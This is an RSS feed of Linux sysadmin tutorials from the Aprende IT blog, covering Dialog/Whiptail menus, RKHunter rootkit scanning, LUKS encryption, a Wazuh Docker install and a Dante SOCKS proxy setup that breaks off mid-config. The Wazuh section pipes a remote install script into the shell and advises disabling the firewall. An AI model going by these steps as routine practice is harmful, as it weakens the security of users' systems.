Aprende IT https://aprendeit.com/en/aprende-it-2/ All the latest news about IT Fri, 23 Aug 2024 12:13:35 +0000 en-US hourly 1 https://aprendeit.com/wp-content/uploads/2020/02/LOGO-CORTO-100x100.png Aprende IT https://aprendeit.com/en/aprende-it-2/ 32 32 Creating Interactive Scripts in Linux: Using Dialog or Whiptail https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/ https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/#respond Fri, 23 Aug 2024 12:13:35 +0000 https://aprendeit.com/?p=6483 In the world of system administration, it is common to encounter the need to automate tasks through shell scripts. However, sometimes we need to make these scripts interactive to facilitate ...

La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.

]]>
In the world of system administration, it is common to encounter the need to automate tasks through shell scripts. However, sometimes we need to make these scripts interactive to facilitate the user experience, especially in environments where a full graphical interface is not available. This is where tools like Dialog and Whiptail come into play.

Both Dialog and Whiptail are tools that allow creating simple and functional graphical interfaces within a text terminal. These tools are very useful for developing menus, dialog boxes, selection lists, progress bars, and much more. Throughout this article, we will guide you through the basic concepts and practical examples of both tools so that you can use them in your own scripts.

What is Dialog?

Dialog is a command-line tool used to generate interactive dialog boxes in text-based terminals. It is widely used in shell scripts to create interactive menus, confirmation boxes, forms, progress bars, among others. Dialog allows users to interact with a script through a text-based user interface, which is especially useful in server environments where a full graphical interface is not available.

Installing Dialog

To install Dialog on a Debian or Ubuntu-based distribution, simply run the following command:

sudo apt-get update
sudo apt-get install dialog

For Red Hat-based distributions like CentOS or Fedora:

sudo yum install dialog

Basic Examples of Dialog

Simple Message Box

This example shows a simple message box with only an “OK” button:

#!/bin/bash
dialog --title "Message" --msgbox "Hello, this is a simple message box." 6 50

Explanation: In this script, –title defines the dialog box title, –msgbox is the type of dialog used, and “6 50” are the dimensions of the box (6 lines high and 50 characters wide).

Interactive Menu

The following example creates a menu where the user can select an option:

#!/bin/bash
option=$(dialog --title "Main Menu" --menu "Select an option:" 15 50 4
1 "Option 1"
2 "Option 2"
3 "Option 3"
4 "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: The menu is displayed with numbered options. 3>&1 1>&2 2>&3 is used to redirect the user’s selection back to the standard output.

Selection List

In this example, the user can select one or more items from a list:

#!/bin/bash
options=$(dialog --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5
1 "Apache" off
2 "MySQL" off
3 "PHP" off
4 "Python" off
5 "Java" off 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: –checklist creates a list of items with checkboxes, where off indicates that the checkbox is unchecked by default.

Progress Bar

Progress bars are useful for showing the progress of a task. Here’s an example:

#!/bin/bash
{
for ((i = 0 ; i <= 100 ; i+=10)); do
sleep 1
echo $i
done
} | dialog --title "Progress" --gauge "Installing..." 10 70 0

Explanation: –gauge is used to create a progress bar. The for loop simulates the progress of a task, increasing the bar by 10% every second.

What is Whiptail?

Whiptail is a lightweight alternative to Dialog that also allows creating text-based interactive interfaces in shell scripts. Although Whiptail offers a similar set of features, it is especially useful in systems where Dialog is not available or where a lighter tool is preferred.

Installing Whiptail

To install Whiptail on Debian, Ubuntu, and their derivatives:

sudo apt-get update
sudo apt-get install whiptail

In distributions like CentOS, Red Hat, and Fedora:

sudo yum install newt

Basic Examples of Whiptail

Simple Message Box

As with Dialog, you can create a simple message box:

#!/bin/bash
whiptail --title "Message" --msgbox "This is a simple message using Whiptail." 8 45

Explanation: This example is similar to Dialog, but using Whiptail. The dimensions of the box are slightly different.

Interactive Menu

Creating interactive menus is easy with Whiptail:

#!/bin/bash
option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \
"1" "Option 1" \
"2" "Option 2" \
"3" "Option 3" \
"4" "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: This script works similarly to the Dialog example, allowing the user to select an option from a menu.

Selection List

Whiptail also allows creating selection lists with checkboxes:

#!/bin/bash
options=$(whiptail --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
"Apache" "" ON \
"MySQL" "" OFF \
"PHP" "" OFF \
"Python" "" OFF \
"Java" "" OFF 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: In this example, “ON” indicates that the checkbox is checked by default, unlike Dialog’s “off”.

Progress Bar

Finally, here’s an example of a progress bar with Whiptail:

#!/bin/bash
{
    for ((i = 0 ; i <= 100 ; i+=10)); do
        sleep 1
        echo $i
    done
} | whiptail --gauge "Installing..." 6 50 0

Explanation: This example is very similar to Dialog, but using Whiptail’s syntax.
Both Dialog and Whiptail are powerful and flexible tools that allow system administrators and developers to create interactive user interfaces within a terminal. Although both tools are similar in functionality, the choice between one or the other may depend on the specific needs of the system and personal preferences.

Dialog is more popular and widely documented, while Whiptail is a lighter alternative that may be preferred in systems where minimizing resource usage is crucial.

In this article, we have covered the basics of Dialog and Whiptail with practical examples that will allow you to start creating your own interactive scripts. Whether you need a simple menu, a message box, or a progress bar, these tools will provide the necessary functionalities to improve user interaction with your scripts.

Remember that the key to mastering these tools is practice. Try the examples provided, modify them to suit your needs, and continue exploring the many possibilities that Dialog and Whiptail offer to make your scripts more intuitive and user-friendly.

Video

Video Script

Below are two example scripts of two interactive menus:
Dialog

#!/bin/bash

# Example of a menu using Dialog
dialog --menu "Select an option:" 15 50 4 \
1 "View system information" \
2 "Show disk usage" \
3 "Configure network" \
4 "Exit" 2>selection.txt

# Read the selected option
option=$(cat selection.txt)

case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

The result would be:

dialog
Whiptail

#!/bin/bash

# Example of a menu using Whiptail
option=$(whiptail --title "Main Menu" --menu "Select an option:" 15 50 4 \
"1" "View system information" \
"2" "Show disk usage" \
"3" "Configure network" \
"4" "Exit" 3>&1 1>&2 2>&3)

# Verify the selected option
case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

With Whiptail, the result would be this:

whiptail
As you can see, the results are very similar.

References and Documentation

For Dialog and Whiptail, you can find extensive documentation at https://invisible-island.net/dialog/dialog.html

La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/feed/ 0
How to Protect Your Linux System: The Ultimate Guide to Installing and Using RKHunter https://aprendeit.com/en/how-to-protect-your-linux-system-the-ultimate-guide-to-installing-and-using-rkhunter/ https://aprendeit.com/en/how-to-protect-your-linux-system-the-ultimate-guide-to-installing-and-using-rkhunter/#respond Mon, 10 Jun 2024 12:07:34 +0000 https://aprendeit.com/?p=6296 In this article, we will explore how to install and configure RKHunter (Rootkit Hunter) on a Linux system. RKHunter is an essential tool for the security of any server, as ...

La entrada How to Protect Your Linux System: The Ultimate Guide to Installing and Using RKHunter se publicó primero en Aprende IT.

]]>
In this article, we will explore how to install and configure RKHunter (Rootkit Hunter) on a Linux system. RKHunter is an essential tool for the security of any server, as it allows the detection of rootkits, backdoors, and local exploits on UNIX systems. We will detail each step, from installation to configuration and scheduling automatic scans. This tutorial is designed for users with basic knowledge of Linux system administration.

Installation of RKHunter

Step 1: Update the Repositories

Before installing any new package, it is always a good practice to make sure that the system repositories are up-to-date. This can be done with the command apt update.

apt update

Step 2: Install RKHunter

Once the repositories are updated, we can proceed to install RKHunter along with the basic system tools (coreutils).

apt install coreutils rkhunter -y

Step 3: Download RKHunter Database Repositories

For RKHunter to function correctly, we need to download the necessary data. This can be done with the curl command.

curl https://rkhunter.sourceforge.net/1.4/mirrors.dat > /var/lib/rkhunter/db/mirrors.dat

Configuration of RKHunter

Common Issue: Unable to Update

If we try to update RKHunter immediately after installation, we are likely to encounter an error similar to the following:

root@host# rkhunter --update
[ Rootkit Hunter version 1.4.6 ]

Checking rkhunter data files...
  Checking file mirrors.dat                                  [ Skipped ]
  Checking file programs_bad.dat                             [ Update failed ]
  Checking file backdoorports.dat                            [ Update failed ]
  Checking file suspscan.dat                                 [ Update failed ]
  Checking file i18n versions                                [ Update failed ]

Please check the log file (/var/log/rkhunter.log)

Solution: Edit the Configuration File

To solve this problem, we need to edit the RKHunter configuration file (/etc/rkhunter.conf). We will use vi or any other text editor we prefer.

vi /etc/rkhunter.conf

Inside the file, we modify the following parameters:

PKGMGR=DPKG
WEB_CMD=wget
UPDATE_MIRRORS=1
MIRRORS_MODE=0

Update of RKHunter

After making these changes, we can try to update RKHunter again.

rkhunter --update

If all goes well, we should see a message indicating that the files have been updated successfully.

Version Verification

We can verify that we are using the latest version of RKHunter with the following command:

rkhunter --versioncheck

Performing a System Scan

Once RKHunter is configured and updated, we can proceed to perform a complete system scan.

rkhunter --check

Example Output from a Scan
During the scan, RKHunter will check various aspects of the system, including system commands, shared libraries, and suspicious files. Here is an example of what we might see:

[ Rootkit Hunter version 1.4.6 ]

Checking system commands...

  Performing 'strings' command checks
    Checking 'strings' command                               [ OK ]

  Performing 'shared libraries' checks
    Checking for preloading variables                        [ None found ]
    Checking for preloaded libraries                         [ None found ]
    Checking LD_LIBRARY_PATH variable                        [ Not found ]

  Performing file properties checks
    Checking for prerequisites                               [ OK ]
    /usr/sbin/adduser                                        [ OK ]
    /usr/sbin/chroot                                         [ OK ]
    /usr/sbin/cron                                           [ OK ]
    /usr/sbin/depmod                                         [ OK ]
    /usr/sbin/fsck                                           [ OK ]
    /usr/sbin/groupadd                                       [ OK ]
    /usr/sbin/groupdel                                       [ OK ]
    /usr/sbin/groupmod                                       [ OK ]
    /usr/sbin/grpck                                          [ OK ]
    /usr/sbin/ifconfig                                       [ OK ]
    /usr/sbin/init                                           [ OK ]
    /usr/sbin/insmod                                         [ OK ]
    /usr/sbin/ip                                             [ OK ]
    /usr/sbin/lsmod                                          [ OK ]
    /usr/sbin/modinfo                                        [ OK ]
    /usr/sbin/modprobe                                       [ OK ]
    /usr/sbin/nologin                                        [ OK ]
    /usr/sbin/pwck                                           [ OK ]
    /usr/sbin/rmmod                                          [ OK ]
    /usr/sbin/route                                          [ OK ]
    /usr/sbin/rsyslogd                                       [ OK ]
    /usr/sbin/runlevel                                       [ OK ]
    /usr/sbin/sshd                                           [ OK ]
    /usr/sbin/sulogin                                        [ OK ]
    /usr/sbin/sysctl                                         [ OK ]
    /usr/sbin/useradd                                        [ OK ]
    /usr/sbin/userdel                                        [ OK ]
    /usr/sbin/usermod                                        [ OK ]
    /usr/sbin/vipw                                           [ OK ]
    /usr/sbin/unhide                                         [ OK ]
    /usr/sbin/unhide-linux                                   [ OK ]
    /usr/sbin/unhide-posix                                   [ OK ]
    /usr/sbin/unhide-tcp                                     [ OK ]
    /usr/bin/awk                                             [ OK ]
    /usr/bin/basename                                        [ OK ]
    /usr/bin/bash                                            [ OK ]
    /usr/bin/cat                                             [ OK ]
    /usr/bin/chattr                                          [ OK ]
    /usr/bin/chmod                                           [ OK ]
    /usr/bin/chown                                           [ OK ]
    /usr/bin/cp                                              [ OK ]
    /usr/bin/curl                                            [ OK ]
    /usr/bin/cut                                             [ OK ]
    /usr/bin/date                                            [ OK ]
    /usr/bin/df                                              [ OK ]
    /usr/bin/diff                                            [ OK ]
    /usr/bin/dirname                                         [ OK ]
    /usr/bin/dmesg                                           [ OK ]
    /usr/bin/dpkg                                            [ OK ]
    /usr/bin/dpkg-query                                      [ OK ]
    /usr/bin/du                                              [ OK ]
    /usr/bin/echo                                            [ OK ]
    /usr/bin/ed                                              [ OK ]
    /usr/bin/egrep                                           [ OK ]
    /usr/bin/env                                             [ OK ]
    /usr/bin/fgrep                                           [ OK ]
    /usr/bin/file                                            [ OK ]
    /usr/bin/find                                            [ OK ]
    /usr/bin/fuser                                           [ OK ]
    /usr/bin/grep                                            [ OK ]
    /usr/bin/groups                                          [ OK ]
    /usr/bin/head                                            [ OK ]
    /usr/bin/id                                              [ OK ]
    /usr/bin/ip                                              [ OK ]
    /usr/bin/ipcs                                            [ OK ]
    /usr/bin/kill                                            [ OK ]
    /usr/bin/killall                                         [ OK ]
    /usr/bin/last                                            [ OK ]
    /usr/bin/lastlog                                         [ OK ]
    /usr/bin/ldd                                             [ OK ]
    /usr/bin/less                                            [ OK ]
    /usr/bin/logger                                          [ OK ]
    /usr/bin/login                                           [ OK ]
    /usr/bin/ls                                              [ OK ]
    /usr/bin/lsattr                                          [ OK ]
    /usr/bin/lsmod                                           [ OK ]
    /usr/bin/lsof                                            [ OK ]
    /usr/bin/mail                                            [ OK ]
    /usr/bin/md5sum                                          [ OK ]
    /usr/bin/mktemp                                          [ OK ]
    /usr/bin/more                                            [ OK ]
    /usr/bin/mount                                           [ OK ]
    /usr/bin/mv                                              [ OK ]
    /usr/bin/netstat                                         [ OK ]
    /usr/bin/newgrp                                          [ OK ]
    /usr/bin/passwd                                          [ OK ]
    /usr/bin/perl                                            [ OK ]
    /usr/bin/pgrep                                           [ OK ]
    /usr/bin/ping                                            [ OK ]
    /usr/bin/pkill                                           [ OK ]
    /usr/bin/ps                                              [ OK ]
    /usr/bin/pstree                                          [ OK ]
    /usr/bin/pwd                                             [ OK ]
    /usr/bin/readlink                                        [ OK ]
    /usr/bin/rkhunter                                        [ OK ]
    /usr/bin/runcon                                          [ OK ]
    /usr/bin/sed                                             [ OK ]
    /usr/bin/sh                                              [ OK ]
    /usr/bin/sha1sum                                         [ OK ]
    /usr/bin/sha224sum                                       [ OK ]
    /usr/bin/sha256sum                                       [ OK ]
    /usr/bin/sha384sum                                       [ OK ]
    /usr/bin/sha512sum                                       [ OK ]
    /usr/bin/size                                            [ OK ]
    /usr/bin/sort                                            [ OK ]
    /usr/bin/ssh                                             [ OK ]
    /usr/bin/stat                                            [ OK ]
    /usr/bin/strace                                          [ OK ]
    /usr/bin/strings                                         [ OK ]
    /usr/bin/su                                              [ OK ]
    /usr/bin/sudo                                            [ OK ]
    /usr/bin/tail                                            [ OK ]
    /usr/bin/telnet                                          [ OK ]
    /usr/bin/test                                            [ OK ]
    /usr/bin/top                                             [ OK ]
    /usr/bin/touch                                           [ OK ]
    /usr/bin/tr                                              [ OK ]
    /usr/bin/uname                                           [ OK ]
    /usr/bin/uniq                                            [ OK ]
    /usr/bin/users                                           [ OK ]
    /usr/bin/vmstat                                          [ OK ]
    /usr/bin/w                                               [ OK ]
    /usr/bin/watch                                           [ OK ]
    /usr/bin/wc                                              [ OK ]
    /usr/bin/wget                                            [ OK ]
    /usr/bin/whatis                                          [ OK ]
    /usr/bin/whereis                                         [ OK ]
    /usr/bin/which                                           [ OK ]
    /usr/bin/who                                             [ OK ]
    /usr/bin/whoami                                          [ OK ]
    /usr/bin/numfmt                                          [ OK ]
    /usr/bin/kmod                                            [ OK ]
    /usr/bin/systemd                                         [ OK ]
    /usr/bin/systemctl                                       [ OK ]
    /usr/bin/gawk                                            [ OK ]
    /usr/bin/bsd-mailx                                       [ OK ]
    /usr/bin/dash                                            [ OK ]
    /usr/bin/x86_64-linux-gnu-size                           [ OK ]
    /usr/bin/x86_64-linux-gnu-strings                        [ OK ]
    /usr/bin/telnet.netkit                                   [ OK ]
    /usr/bin/which.debianutils                               [ OK ]
    /usr/lib/systemd/systemd                                 [ OK ]

[Press  to continue]

...

[Press  to continue]

System checks summary
=====================

File properties checks...
    Files checked: 142
    Suspect files: 0

Rootkit checks...
    Rootkits checked : 498
    Possible rootkits: 0

Applications checks...
    All checks skipped

The system checks took: 4 minutes and 25 seconds

All results have been written to the log file: /var/log/rkhunter.log

One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)

Automation of Scans with Cron

To ensure that our system remains secure, it’s a good idea to schedule automatic scans. We can do this by editing the /etc/crontab file to add the necessary cron jobs. Don’t forget to modify the destination email to receive the alerts.

vi /etc/crontab

Add the following lines to the file:

0 3 * * * root /usr/bin/rkhunter --update >> /var/log/rkhunter_update.log 2>&1
0 2 * * * root /usr/bin/rkhunter --cronjob --update --report-warnings-only | mail -s "RKHunter Daily Scan" your-email@example.com

With this, we have configured a cron job that will update RKHunter daily at 3 AM and perform a daily scan at 2 AM, sending a report by email only if warnings are found.

La entrada How to Protect Your Linux System: The Ultimate Guide to Installing and Using RKHunter se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/how-to-protect-your-linux-system-the-ultimate-guide-to-installing-and-using-rkhunter/feed/ 0
Partition and Disk Encryption with LUKS on Linux https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/ https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/#respond Sun, 12 May 2024 19:28:46 +0000 https://aprendeit.com/?p=6240 Welcome to the fascinating world of partition and disk encryption on Linux using LUKS (Linux Unified Key Setup). In this chapter, we will explore in detail how to use LUKS ...

La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.

]]>
Welcome to the fascinating world of partition and disk encryption on Linux using LUKS (Linux Unified Key Setup). In this chapter, we will explore in detail how to use LUKS to protect your sensitive data by encrypting your disks and partitions. From installing necessary tools to handling specialized commands, I will guide you step by step through this crucial process for your data security.

Installing Necessary Tools

Before diving into the world of encryption with LUKS, it is essential to ensure you have the appropriate tools installed on your system. Generally, most Linux distributions include these encryption tools by default, but it’s always good to verify.

You can install the necessary tools using your distribution’s package manager. In Debian-based distributions, like Ubuntu, you can run the following command in the terminal:

sudo apt install cryptsetup

If you are using a Red Hat-based distribution, like Fedora or CentOS, you can install the encryption tools with the following command:

sudo dnf install cryptsetup

Once you have installed cryptsetup, you will be ready to start working with LUKS.

Creating a LUKS Volume

The first step to encrypt a partition or disk on Linux is to create a LUKS volume. This volume will act as an encryption layer that protects the data stored on the partition or disk.

To create a LUKS volume, you will need to specify the partition or disk you want to encrypt. Make sure the partition is unmounted before proceeding. Suppose we want to encrypt the partition /dev/sdb1. The following command will create a LUKS volume on this partition:

sudo cryptsetup luksFormat /dev/sdb1

This command will initiate the process of creating the LUKS volume on the specified partition. You will be prompted to confirm this action, as the process will erase all existing data on the partition. After confirming, you will be asked to enter a password to unlock the LUKS volume in the future. Make sure to choose a secure password and remember it well, as you will need it every time you want to access the encrypted data.

Once the process is complete, you will have a LUKS volume created on the specified partition, ready to be used.

Opening and Closing the LUKS Volume

After creating a LUKS volume, the next step is to open it to access the data stored on it. To open a LUKS volume, you will need to specify the partition containing the volume and assign it a name.

sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition

In this command, /dev/sdb1 is the partition containing the LUKS volume, and my_encrypted_partition is the name we are assigning to the opened volume. Once you run this command, you will be asked to enter the password you specified during the creation of the LUKS volume. After entering the correct password, the volume will open and be ready to be used.

To close the LUKS volume and block access to the encrypted data, you can use the following command:

sudo cryptsetup luksClose my_encrypted_partition

This command will close the LUKS volume with the specified name (my_encrypted_partition in this case), preventing access to the data stored on it until it is opened again.

Creating a File System on a LUKS Volume

Once you have opened a LUKS volume, you can create a file system on it to start storing data securely. You can use any Linux-compatible file system, such as xfs or btrfs.

Suppose we want to create an xfs file system on the opened LUKS volume (my_encrypted_partition). The following command will create an xfs file system on the volume:

sudo mkfs.xfs /dev/mapper/my_encrypted_partition

This command will format the opened LUKS volume with an xfs file system, allowing you to start storing data on it securely.

Mounting and Unmounting a LUKS Volume

Once you have created a file system on a LUKS volume, you can mount it to the file system to access the data stored on it. To mount a LUKS volume, you can use the following command:

sudo mount /dev/mapper/my_encrypted_partition /mnt

In this command, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS volume, and /mnt is the mount point where the file system will be mounted.

After mounting the LUKS volume, you can access the data stored on it as you would with any other file system mounted on Linux. When you have finished working with the data, you can unmount the LUKS volume using the following command:

sudo umount /mnt

This command will unmount the file system of the LUKS volume, preventing access to the data stored on it until it is mounted again.

Managing LUKS Volumes

LUKS provides several tools for managing volumes, including the ability to change the password, add additional keys, and backup the headers of the volumes.

To change the password of a LUKS volume, you can use the following command:

sudo cryptsetup luksChangeKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new password.

If you want to add an additional key to the LUKS volume, you can use the following command:

sudo cryptsetup luksAddKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new additional key.

To backup the header of a LUKS volume, you can use the following command:

sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file

This command will backup the header of the LUKS volume to the specified file, allowing you to restore it in case the volume header is damaged.

Summary of Commands to Create Encrypted Volume with LUKS

sudo cryptsetup luksFormat /dev/DISK
sudo cryptsetup luksOpen /dev/DISK DECRYPTED_DISK
sudo mkfs.xfs /dev/mapper/DECRYPTED_DISK
sudo mount /dev/mapper/DECRYPTED_DISK /mount_point

Integration with crypttab and fstab

Once you have encrypted a partition or disk using LUKS on Linux, you may want to configure the automatic opening of the LUKS container during system boot and mount it at a specific point in the file system. This can be achieved using the crypttab and fstab configuration files.

crypttab Configuration

The crypttab file is used to configure the automatic mapping of encrypted devices during the system boot process. You can specify the encrypted devices and their corresponding encryption keys in this file.

To configure an encrypted device in crypttab, you first need to know the UUID (Universally Unique Identifier) of the LUKS container. You can find the UUID by running the following command:

sudo cryptsetup luksUUID /dev/sdb1

Once you have the UUID of the LUKS container, you can add an entry in the crypttab file to configure the automatic mapping. For example, suppose the UUID of the LUKS container is 12345678-1234-1234-1234-123456789abc. You can add the following entry to the crypttab file:

my_encrypted_partition UUID=12345678-1234-1234-1234-123456789abc none luks

It can also be done this way without using the UUID:

my_encrypted_partition /dev/sdb1 none luks

In this entry, my_encrypted_partition is the name we have given to the LUKS container, and UUID=12345678-1234-1234-1234-123456789abc is the UUID of the container. The word none indicates that no pre-shared key is used, and luks specifies that the device is encrypted with LUKS.

fstab Configuration

Once you have configured the automatic mapping of the encrypted device in crypttab, you can configure the automatic mounting of the file system in fstab. The fstab file is used to configure the automatic mounting of file systems during system boot.

To configure the automatic mounting of a file system in fstab, you first need to know the mount point and the file system type of the LUKS container. Suppose the mount point is /mnt/my_partition and the file system is xfs. You can add an entry in the fstab file as follows:

/dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults 0 2

In this entry, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS container, /mnt/my_partition is the mount point where the file system will be mounted, xfs is the file system type, defaults specifies the default mount options, and 0 2 specifies the file system check options.

Recommendations with crypttab

In the case of a server, I would not have crypttab active, meaning I would leave the configuration set but commented out, as well as with fstab. I would perform the mounts manually after a reboot. This avoids having to use key files and prevents some derived issues.

La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/feed/ 0
Install Your Own Wazuh Server on Ubuntu https://aprendeit.com/en/install-your-own-wazuh-server-on-ubuntu/ https://aprendeit.com/en/install-your-own-wazuh-server-on-ubuntu/#respond Sat, 27 Apr 2024 14:41:38 +0000 https://aprendeit.com/?p=6208 Wazuh has become an essential tool for security management in information systems. Thanks to its ability to detect intrusions, ensure data integrity, and monitor security, many companies and individuals choose ...

La entrada Install Your Own Wazuh Server on Ubuntu se publicó primero en Aprende IT.

]]>
Wazuh has become an essential tool for security management in information systems. Thanks to its ability to detect intrusions, ensure data integrity, and monitor security, many companies and individuals choose to set up their own Wazuh server. Here I will explain how you can install and configure your Wazuh server, step by step, without using complicated lists or enumerations.

What is Wazuh and Why Should You Use It?

Wazuh is an open-source security platform that provides intrusion detection, integrity monitoring, incident response, and compliance auditing. Its versatility makes it ideal for both small businesses and large corporations. Furthermore, being open-source, Wazuh is completely free and allows modifications to meet any specific needs.

Initial Preparations Before Installation

Before you dive into the installation of Wazuh, it is crucial that you prepare your system. This involves ensuring that the operating system is updated and setting up the environment to support the installation of Wazuh through Docker. Here is how you do it:

First, it is necessary to disable the firewall to prevent it from interfering with the installation process. To do this, simply execute in the terminal:

ufw disable

This command will disable the firewall, ensuring that it will not block any of the necessary connections during the installation.

Next, you must ensure that all system packages are updated and that git is installed, as you will need it to clone the Wazuh repository. Execute:

apt update && apt install git

With these commands, your system will be updated and ready for the next phase.

Installing Docker

Wazuh in Docker simplifies dependency management and ensures that the platform can run isolated and secure. To install Docker, you can use the script provided by Docker, which sets up everything automatically:

curl -sSL https://get.docker.com/ | sh

Once Docker is installed, it is essential to ensure it automatically runs at system startup:

systemctl start docker
systemctl enable docker

These commands will start the Docker service and configure it to automatically start at each system boot.

Docker Compose

If you install Docker as previously indicated, you do not need to install this tool, but if you already have Docker and it does not support “docker compose”, you can install docker-compose like this:

curl -L "https://github.com/docker/compose/releases/download/v2.12.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose

The following commands that have “docker compose” should be executed as docker-compose.

 

Setting Up the Wazuh Environment

With Docker already configured, the next step is to prepare the specific environment for Wazuh. Head to the optimal directory to keep organized the files related to security:

cd /opt

Now, it is time to clone the most recent version of the Wazuh repository for Docker:

git clone https://github.com/wazuh/wazuh-docker.git -b v4.7.3

This command downloads all the necessary files to run Wazuh in a Docker container.

Generating Certificates and Starting Up Wazuh

Before starting Wazuh, you must generate the necessary certificates for the proper functioning of the Wazuh components. Navigate to the correct directory and execute the certificate generator:

cd wazuh-docker/single-node/
docker compose -f generate-indexer-certs.yml run --rm generator

With the certificates generated, you are now ready to start all the Wazuh services:

docker compose up -d

This last command lifts all the containers necessary for Wazuh to operate properly in a single-node mode, ideal for test environments or small implementations.

Verification of the Installation

Once all the previous steps are completed, it is important to verify that everything is working as expected. You can check the status of the Docker containers to ensure that all Wazuh services are active and running. Additionally, access the Wazuh web interface to start exploring the functionalities and available settings.

Customization and Monitoring

With your Wazuh server now operational, the next step is to customize the configuration to adapt it to your specific needs. Wazuh offers a wide variety of options for configuring rules, alerts, and automatic responses to incidents. Take advantage of the available documentation to explore all the possibilities that Wazuh offers.

Installing and configuring your own Wazuh server may seem like a complex task, but by following these steps, you will have a robust computer security system without needing large investments. Not only will it improve the security of your information, but it will also provide you with a powerful tool to monitor and proactively respond to any incident.

Wazuh Password Change

Stop the service using Docker Compose:

docker compose down

Generate the hash of the new password using the Wazuh container:

Run the following command to start the hash script:

docker run --rm -ti wazuh/wazuh-indexer:4.6.0 bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/hash.sh

Enter the new password when prompted and copy the generated hash.

Update the internal users file with the hash of the new password:

Open the file with a text editor like vim:

vim config/wazuh_indexer/internal_users.yml

Paste the generated hash for the admin user.

Update the docker-compose.yml file with the new password:

Open the docker-compose.yml file:

vim docker-compose.yml

Enter the new password in lines 24 and 81 where it says INDEXER_PASSWORD.

Raise the services again with Docker Compose:

docker compose up -d

This restarts the service stack.

Access the container and run the security script:

Access the container:

docker exec -it single-node-wazuh.indexer-1 bash

Define the variables and run the security script:

export INSTALLATION_DIR=/usr/share/wazuh-indexer
CACERT=$INSTALLATION_DIR/certs/root-ca.pem
KEY=$INSTALLATION_DIR/certs/admin-key.pem
CERT=$INSTALLATION_DIR/certs/admin.pem
export JAVA_HOME=/usr/share/wazuh-indexer/jdk
bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -cd /usr/share/wazuh-indexer/opensearch-security/ -nhnv -cacert $CACERT -cert $CERT -key $KEY -p 9200 -icl

Exit the container:

exit

This process allows you to update the admin password for Wazuh using Docker, making sure to follow all the steps correctly to ensure the changes are effective.

La entrada Install Your Own Wazuh Server on Ubuntu se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/install-your-own-wazuh-server-on-ubuntu/feed/ 0
Create SOCKS Proxy with Dante and OpenSSH https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/ https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/#respond Mon, 25 Mar 2024 22:31:35 +0000 https://aprendeit.com/?p=6152 How to Create a SOCKS Proxy with Dante on Ubuntu In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity ...

La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.

]]>
How to Create a SOCKS Proxy with Dante on Ubuntu

In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity and data on the internet is through the use of a SOCKS proxy server. This type of proxy acts as an intermediary between your device and the internet, hiding your real IP address and encrypting your internet traffic. In this article, we will guide you step by step on how to set up your own SOCKS proxy server on Ubuntu using Dante, a versatile and high-performance proxy server.

Starting Dante Installation

Before diving into the Dante setup, it’s essential to prepare your system and ensure it is updated. To do this, open a terminal and run the following commands:

sudo apt update
sudo apt install dante-server

These commands will update your system’s package list and then install Dante, respectively.

Configuring the danted.conf File

Once Dante is installed, the next step is to configure the proxy server. This is done by editing the danted.conf configuration file located in /etc/danted/. To do this, use your preferred text editor. Here, we will use vim:

vim /etc/danted.conf

Inside this file, you must specify crucial details such as the external and internal interfaces, the authentication method, and access rules. Below, we show you an example configuration that you can adjust according to your needs:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The external interface (can be your public IP address or the interface name)
external: eth0

# The internal interface (usually your server's IP address or loopback)
internal: 0.0.0.0 port=1080

# Authentication method
socksmethod: username

# Access rules
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    log: connect disconnect error
}

# Who can use this proxy
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    command: bind connect udpassociate
    log: connect disconnect error
    socksmethod: username
}

